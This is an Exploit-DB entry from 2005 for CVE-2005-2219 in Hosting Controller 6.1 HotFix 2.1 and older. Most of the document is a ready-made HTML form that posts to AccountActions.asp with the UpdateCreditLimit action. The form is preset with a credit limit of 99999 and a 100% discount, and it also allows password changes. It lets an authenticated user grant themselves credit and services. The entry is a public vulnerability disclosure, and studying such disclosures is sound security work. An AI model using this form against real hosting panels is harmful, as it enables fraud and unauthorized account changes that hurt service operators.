Hosting Controller <= 0.6.1 HotFix 2.1 Change Credit Limit Exploit

2005-07-10T00:00:00
ID EDB-ID:1096
Type exploitdb
Reporter Soroush Dalili
Modified 2005-07-10T00:00:00

Description

Hosting Controller <= 0.6.1 HotFix 2.1 Change Credit Limit Exploit. CVE-2005-2219. Remote exploit for windows platform

                                        
                                            Hi, I'm Soroush Dalili from GSG (GrayHatz Security Group).
Title: Hosting controller program have a security bug in "AccountActions.asp" that an authenticated 
user can change his/her credit and buy some services!

Version: 6.1 HotFix 2.1 and older
Developer url: hostingcontroller.com
Comment: Hosting Controller is an application to manage a host.
Exploit code to proof:
--------------------------------
GET CREDIT&lt;br&gt;Soroush Dalili from GSG&lt;br&gt;
&lt;form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post"&gt;
&lt;table&gt;
&lt;tr&gt;
&lt;td&gt;Username:&lt;/td&gt;
&lt;td&gt;&lt;input type="text" name="UserName" value=""&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Description:&lt;/td&gt;
&lt;td&gt;&lt;input type="text" name="Description" value=""&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;FullName:&lt;/td&gt;
&lt;td&gt;&lt;input type="text" name="FullName" value=""&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AccountDisabled 1,[blank]:&lt;/td&gt;
&lt;td&gt;&lt;input type="text" name="AccountDisabled" value=""&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;UserChangePassword:&lt;/td&gt;
&lt;td&gt;&lt;input type="text" name="UserChangePassword" value=""&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PassCheck=TRUE,0:&lt;/td&gt;
&lt;td&gt;&lt;input type="text" name="PassCheck" value="0"&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;New Password:&lt;/td&gt;
&lt;td&gt;&lt;input type="text" name="Pass1" value=""&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DefaultDiscount%:&lt;/td&gt;
&lt;td&gt;&lt;input type="text" name="DefaultDiscount" value="100"&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CreditLimit:&lt;/td&gt;
&lt;td&gt;&lt;input type="text" name="CreditLimit" value="99999"&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;br&gt;&lt;input type="submit"&gt;
&lt;/form&gt;
&lt;hr&gt;&lt;br&gt;

# milw0rm.com [2005-07-10]